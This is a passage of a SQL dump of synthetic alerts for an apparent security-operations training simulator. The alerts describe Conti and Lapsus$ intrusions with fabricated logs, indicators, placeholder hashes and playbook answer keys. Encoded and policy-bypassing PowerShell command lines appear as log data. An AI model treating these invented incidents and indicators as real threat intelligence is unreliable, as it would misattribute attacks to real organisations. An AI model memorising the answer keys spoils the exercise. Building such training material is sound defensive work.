detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"public_disclosure\\\",\\\"source_ip\\\":\\\"198.51.100.14\\\",\\\"affected_organization\\\":\\\"Nvidia\\\",\\\"media_outlet\\\":\\\"HackerNews\\\",\\\"disclosed_data\\\":[{\\\"file_name\\\":\\\"nvidia_leaked_plans.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"},{\\\"file_name\\\":\\\"confidential_emails.txt\\\",\\\"file_hash\\\":\\\"7d793037a0760186574b0282f2f435e7\\\"}],\\\"user_account\\\":\\\"attacker@darkmail.com\\\",\\\"disclosure_platform\\\":\\\"https://hackernews.com/leaks/nvidia\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(911, 'Suspicious Email: Initial Access', 'medium', 'Email Gateway Logs', 'A phishing email was detected attempting to gain initial access to government networks by exploiting vulnerabilities in employee awareness. The email contained a malicious attachment aiming to compromise ministry systems.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"email_subject\":\"Important Update - Payroll Department\",\"sender_email\":\"hr-department@maliciousdomain.com\",\"recipient_email\":\"employee@governmentagency.gov\",\"attachment_name\":\"Payroll_Update_2023.docx\",\"attachment_hash\":\"b6a9c8b37a7d7c8c8d8e9f8b9f8e7d7c\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"malicious_link\":\"http://maliciousdomain.com/update\"}', '2026-01-15 01:02:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"hr-department@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b6a9c8b37a7d7c8c8d8e9f8b9f8e7d7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware by multiple AV engines.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in phishing activities.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing landing 
page.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email: Initial Access\",\"date\":\"2026-02-01T20:32:22.594Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(912, 'Malicious Script Execution Detected', 'high', 'Endpoint Detection and Response (EDR) Systems', 'Once access was obtained, Conti executed malicious scripts to deploy ransomware across critical infrastructure systems.', 'Malware Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:35Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"85.214.132.117\",\"destination_ip\":\"192.168.1.12\",\"destination_user\":\"jdoe\",\"malicious_file\":\"ransom_deploy.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"execution_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransom_deploy.ps1\",\"process_id\":4321,\"alert_trigger\":\"Suspicious script execution detected by EDR\"}', '2026-01-15 01:02:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"85.214.132.117\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple ransomware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransom_deploy.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Script known to deploy Conti ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Conti ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(913, 'Persistence Mechanism Established', 'medium', 'Network Traffic Analysis', 'To ensure continued access, Conti installed backdoors on compromised systems, allowing them to remotely control and further exploit the network.', 'Backdoor Installation', 'T1543.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":\"4444\",\"dst_port\":\"80\",\"action\":\"Established\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_name\":\"Conti_Backdoor\",\"user\":\"jdoe\",\"filename\":\"conti_backdoor.exe\"}', '2026-01-15 01:02:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the organization.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Conti C2 servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Conti backdoor sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"conti_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_forensics\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable identified as part of Conti toolkit.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account within the 
organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(914, 'Lateral Movement to Multiple Ministries', 'critical', 'Active Directory Logs', 'Conti used stolen credentials to move laterally across the network, encrypting data across multiple ministries and escalating the scale of their attack.', 'Credential Theft', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:35:20Z\",\"event_id\":\"4625\",\"log_name\":\"Security\",\"source_ip\":\"185.123.45.67\",\"user_name\":\"j.doe@government.ministry\",\"target_user\":\"administrator@ministryA.local\",\"target_host\":\"ministryA-server-01\",\"action\":\"Logon Failure\",\"failure_reason\":\"Unknown user name or bad password\",\"hash\":\"bf8e3c7d9b4f5a6c8d7a9b4e3c7d9f8e\",\"file_name\":\"ContiRansomware.exe\",\"internal_ip\":\"192.168.15.23\"}', '2026-01-15 01:02:55', '2026-02-16 17:55:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Conti ransomware command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@government.ministry\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"bf8e3c7d9b4f5a6c8d7a9b4e3c7d9f8e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Conti ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ContiRansomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Conti ransomware.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network 
Scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(915, 'Unauthorized Access Detected on Samsung Network', 'high', 'Network Intrusion Detection System (NIDS)', 'An unauthorized access attempt was detected on Samsung\'s corporate network. Analysis indicates that the Lapsus$ group used stolen credentials from a previous phishing campaign to gain initial access.', 'Initial Access', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T02:14:30Z\",\"event_id\":\"1001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"result\":\"failure\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"credentials_source\":\"phishing_campaign\",\"event_description\":\"Failed login attempt detected from external IP using known compromised credentials.\"}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous intrusions by Lapsus$ group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server used for corporate applications.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account targeted in recent phishing campaign.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(916, 'Malicious Script Execution Identified', 'high', 'Endpoint Detection and Response (EDR)', 'Detected execution of unauthorized scripts on an endpoint aimed at exploring the network for systems with valuable source code. This activity is indicative of an attacker attempting to broaden their access and control.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:33:25Z\",\"event_id\":\"EDR-456789\",\"hostname\":\"compromised-host-01\",\"user\":\"jdoe\",\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Documents\\\\recon.ps1\",\"parent_process\":\"explorer.exe\"},\"network\":{\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\recon.ps1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"size\":20480},\"malicious_indicator\":{\"external_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a malware toolkit.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"recon.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Script used for unauthorized network exploration.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 
Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(917, 'Backdoor Established on Critical Servers', 'high', 'Server Logs', 'A persistent backdoor was installed on critical servers by Lapsus$, enabling continued undetected access.', 'Persistence', 'T1055 - Process Injection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.10\",\"username\":\"admin_user\",\"process_name\":\"svchost.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"process_injection\",\"message\":\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\"}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal AD\",\"verdict\":\"suspicious\",\"details\":\"Admin user was compromised for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lapsus$ backdoor malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 
0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.600Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"process_injection\\\",\\\"message\\\":\\\"Remote process injection detected on server 
10.1.1.10 by user admin_user from IP 203.0.113.45.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(918, 'Lateral Movement Across Development Environment', 'high', 'User Activity Monitoring', 'Using compromised admin accounts, threat actors moved laterally across the development environment targeting repositories with Galaxy device bootloaders and TrustZone security code.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"user_activity\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.45\",\"compromised_username\":\"admin_user1\",\"action\":\"access_repository\",\"repository_name\":\"GalaxyBootloaders\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_accessed\":\"TrustZone_code.zip\"}', '2026-01-15 01:03:01', '2026-02-14 16:52:12', 